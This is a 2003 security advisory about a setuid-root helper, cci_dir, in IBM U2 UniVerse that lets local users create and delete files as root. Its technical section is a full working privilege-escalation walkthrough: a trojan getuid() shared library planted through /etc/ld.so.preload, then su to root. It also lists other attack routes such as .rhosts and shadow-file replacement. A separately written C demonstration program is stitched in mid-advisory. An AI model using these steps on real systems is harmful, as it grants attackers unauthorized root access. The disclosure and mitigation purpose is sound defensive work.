Packet Storm PACKETSTORM:31367
SRT2003-07-07-0831.txt
Strategic Reconnaissance Team
Jul 17, 2003
packetstormsecurity.com

Secure Network Operations, Inc. http://www.secnetops.com  
Strategic Reconnaissance Team [email protected]  
Team Lead Contact [email protected]  
  
  
Our Mission:  
************************************************************************  
Secure Network Operations offers expertise in Networking, Intrusion   
Detection Systems (IDS), Software Security Validation, and   
Corporate/Private Network Security. Our mission is to facilitate a   
secure and reliable Internet and inter-enterprise communications   
infrastructure through the products and services we offer.   
  
  
Quick Summary:  
************************************************************************  
Advisory Number : SRT2003-07-X-XXXX  
Product : IBM U2 UniVerse  
Version : Version <= 10.0.0.9 (DGUX = 7.3.2.1)   
Vendor : http://ibm.com/software/data/u2/universe/  
Class : local  
Criticality : High (to UniVerse servers with local users)   
Operating System(s) : DGUX, Linux (possibly other UNIX-based platforms)  
  
  
High Level Explanation  
************************************************************************  
High Level Description : cci_dir creates hard links as root.   
What to do : chmod -s /usr/ibm/uv/bin/cci_dir  
  
  
Technical Details  
************************************************************************  
Proof Of Concept Status : No PoC needed for this issue.   
Low Level Description :   
  
UniVerse is an extended relational database designed for embedding in   
vertical applications. Its nested relational data model results in   
intuitive data modeling and fewer resulting tables. UniVerse provides   
data access, storage and management capabilities across Microsoft®  
Windows® NT, Linux and UNIX platforms.  
  
A legacy program, apparently left over from UniVerse's support for the CCI   
(Concurrent Controls Inc) operating system, can give a normal user root   
access. cci_dir is installed setuid root and calls link() on two   
user-supplied paths while running as root, which lets an attacker make a   
file they control appear under any path that does not yet exist (link()   
refuses to overwrite an existing destination). cci_dir then calls unlink()   
on the first path, again as root, so the attacker can also remove any file   
of their choice. Combining the two gives root in a number of ways. The only   
limitation is that a hard link cannot cross filesystem boundaries, so a   
target that lives on a different partition from the attacker's file is out   
of reach. As H D Moore of http://digitaldefense.net pointed out to me,   
linking across partitions makes the link() call fail:  
  
link("/etc/passwd", "/tmp/test") = -1 EXDEV (Invalid cross-device link)  
  
The above limitation by no means stops exploitation of this issue. Some of   
the attacker's options include placing "+ +" in a .rhosts file, unlinking   
and recreating the shadow or password files, or trojaning shared library   
files.  
  
The results of this issue are demonstrated below.  
  
[root@vegeta bin]# ls -al ./cci_dir  
-rwsr-x--x 1 root bin 10328 Apr 3 21:57 ./cci_dir  
  
[root@vegeta bin]# ltrace ./cci_dir USER_SUPPLIED USER_SUPPLIED2  
...  
link("USER_SUPPLIED", "USER_SUPPLIED2") = -1  
fprintf(0x4212ef80, "Was unable to link files\n") = 25  
  
[root@vegeta bin]# touch a  
[root@vegeta bin]# ltrace ./cci_dir a b  
...  
link("a", "b") = 0  
unlink("a") = 0  
  
Let's see how the above can lead to a root compromise.   
  
My first target is /etc/ld.so.preload. We cannot link onto a destination   
that already exists, so let's have cci_dir unlink() the existing file for   
us: passed as the first argument, it is hard-linked into our directory and   
then removed from /etc.  
  
[kf@vegeta kf]$ ls -al /etc/ld.so.preload  
-rw-r--r-- 1 root root 0 Jul 7 20:03 /etc/ld.so.preload  
  
[kf@vegeta kf]$ /usr/ibm/uv/bin/cci_dir /etc/ld.so.preload isgone  
Was unable to unlink file isgone/..  
  
[kf@vegeta kf]$ ls -al isgone  
-rw-r--r-- 1 root root 0 Jul 7 20:03 isgone  
  
[kf@vegeta kf]$ ls -al /etc/ld.so.preload  
ls: /etc/ld.so.preload: No such file or directory  
  
Next, let's prepare the shared library for the /etc/ld.so.preload attack.   
Overriding getuid() to return 0 is enough: su uses getuid() to decide   
whether the caller is already root and skips the password prompt if so, and   
unlike the LD_PRELOAD environment variable, /etc/ld.so.preload is honored   
by the dynamic loader even for setuid binaries such as su.  
[kf@vegeta kf]$ cat > oops.c  
int getuid(void)  
{  
return(0);  
}  
^C  
  
[kf@vegeta kf]$ gcc -c -o oops.o oops.c  
[kf@vegeta kf]$ ld -shared -o oops.so oops.o  
[kf@vegeta kf]$ cat > owned  
/home/kf/oops.so  
^C  
  
Next we cause cci_dir to hardlink to our trojan ld.so.preload file.  
[kf@vegeta kf]$ /usr/ibm/uv/bin/cci_dir owned /etc/ld.so.preload  
Was unable to unlink file /etc/ld.so.preload/..  
  
Note that /etc/ld.so.preload now exists again, but the inode is ours: a   
hard link shares the original inode, so the file keeps kf's ownership and   
our contents, and the dynamic loader does not care who owns it.  
  
[kf@vegeta kf]$ ls -al /etc/ld.so.preload  
-rw-rw-r-- 1 kf kf 18 Jun 27 18:41 /etc/ld.so.preload  
  
[kf@vegeta kf]$ cat /etc/ld.so.preload  
/home/kf/oops.so  
  
Now you can simply take root (note that su does NOT ask for a password,   
because the preloaded getuid() returns 0):  
  
[kf@vegeta kf]$ su -  
[root@vegeta root]# id  
uid=0(root) gid=0(root) groups=0(root)  
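The two filesystem facts the walkthrough above relies on, that link() fails with EEXIST on an existing destination (hence the initial unlink of /etc/ld.so.preload) and that a hard link carries the original inode and owner (hence the kf-owned /etc/ld.so.preload), can be checked without any privileges. The following C program is an added example and is not part of the advisory or of IBM's code: `cci_dir_sequence` reproduces the link()/unlink() call sequence the ltrace output shows, `cci_dir_sequence_unprivileged` is an illustrative least-privilege pattern (drop to the caller's real uid/gid before touching user-supplied paths; not IBM's fix, which is to remove the setuid bit or the binary), and `demo_hardlink_semantics` exercises both in a constructed temp directory. All file names and contents in it are made up for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The privileged call sequence the advisory's ltrace shows cci_dir making on
 * two user-supplied paths: link(src, dst), then unlink(src).
 * Returns 0 on success, otherwise -errno from the failing call:
 *   -EEXIST  dst already exists (why the exploit first unlinks its target)
 *   -EXDEV   src and dst are on different filesystems (the noted limitation)
 *   -ENOENT  src does not exist */
static int cci_dir_sequence(const char *src, const char *dst)
{
    if (link(src, dst) != 0)
        return -errno;
    if (unlink(src) != 0)
        return -errno;
    return 0;
}

/* Least-privilege variant (illustrative pattern, not IBM's fix): a setuid
 * program that must operate on user-supplied paths drops irrevocably to the
 * caller's real uid/gid first, so the kernel applies the caller's own
 * permissions to link()/unlink(). In a non-setuid process this is a no-op. */
static int cci_dir_sequence_unprivileged(const char *src, const char *dst)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setresgid(rgid, rgid, rgid) != 0 || setresuid(ruid, ruid, ruid) != 0)
        return -errno;
    if (geteuid() != ruid || getegid() != rgid)
        return -EPERM;            /* refuse to continue with leftover privilege */
    return cci_dir_sequence(src, dst);
}

/* Demonstrates, in a private temp directory with a constructed file:
 *  1. after link()+unlink(), dst is the inode src was, with src's owner
 *     (why /etc/ld.so.preload ends up owned by kf in the advisory);
 *  2. link() onto an existing path fails with EEXIST (why the attacker first
 *     has cci_dir unlink() the original /etc/ld.so.preload).
 * Returns 0 if both hold, otherwise a negative step number. */
static int demo_hardlink_semantics(void)
{
    char dir[] = "/tmp/cci_demo.XXXXXX";      /* constructed scratch directory */
    char src[300], dst[300];
    struct stat before, after;
    FILE *f;
    int rc;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(src, sizeof src, "%s/owned", dir);
    snprintf(dst, sizeof dst, "%s/ld.so.preload", dir);

    if ((f = fopen(src, "w")) == NULL) { rmdir(dir); return -2; }
    fputs("/home/kf/oops.so\n", f);           /* constructed sample content */
    fclose(f);

    if (stat(src, &before) != 0)
        rc = -3;
    else if (cci_dir_sequence_unprivileged(src, dst) != 0)
        rc = -4;
    else if (access(src, F_OK) == 0)
        rc = -5;                               /* src must be gone */
    else if (stat(dst, &after) != 0)
        rc = -6;
    else if (after.st_ino != before.st_ino || after.st_uid != before.st_uid)
        rc = -7;                               /* same inode, same owner */
    else if ((f = fopen(src, "w")) == NULL)
        rc = -8;
    else {
        fclose(f);
        /* dst exists now: a second link onto it must fail with EEXIST */
        rc = (cci_dir_sequence(src, dst) == -EEXIST) ? 0 : -9;
    }

    unlink(src);
    unlink(dst);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = demo_hardlink_semantics();
    printf("hard-link semantics demo: %s (rc=%d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc == 0 ? 0 : 1;
}
```

Build with `gcc -Wall -o cci_demo cci_demo.c` and run as an ordinary user; the EXDEV case is not exercised because it needs two filesystems, but `cci_dir_sequence` reports it the same way it reports EEXIST.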
  
  
Patch or Workaround : chmod -s /usr/ibm/uv/bin/cci_dir  
  
Vendor Status : The IBM U2 staff will have this issue resolved   
in a future release of IBM U2. Patches may also be supplied on a per-client   
basis at IBM's discretion.   
  
Research and testing by the IBM staff has confirmed that cci_dir is no longer   
required for current UniVerse platform support. It will be removed from future   
UniVerse releases. Customers may also remove it from their systems to mitigate   
this vulnerability.  
  
Bugtraq URL : to be assigned  
  
------------------------------------------------------------------------  
This advisory was released by Secure Network Operations,Inc. as a matter  
of notification to help administrators protect their networks against  
the described vulnerability. Exploit source code is no longer released  
in our advisories. Contact [email protected] for information on how  
to obtain exploit information.  
  
  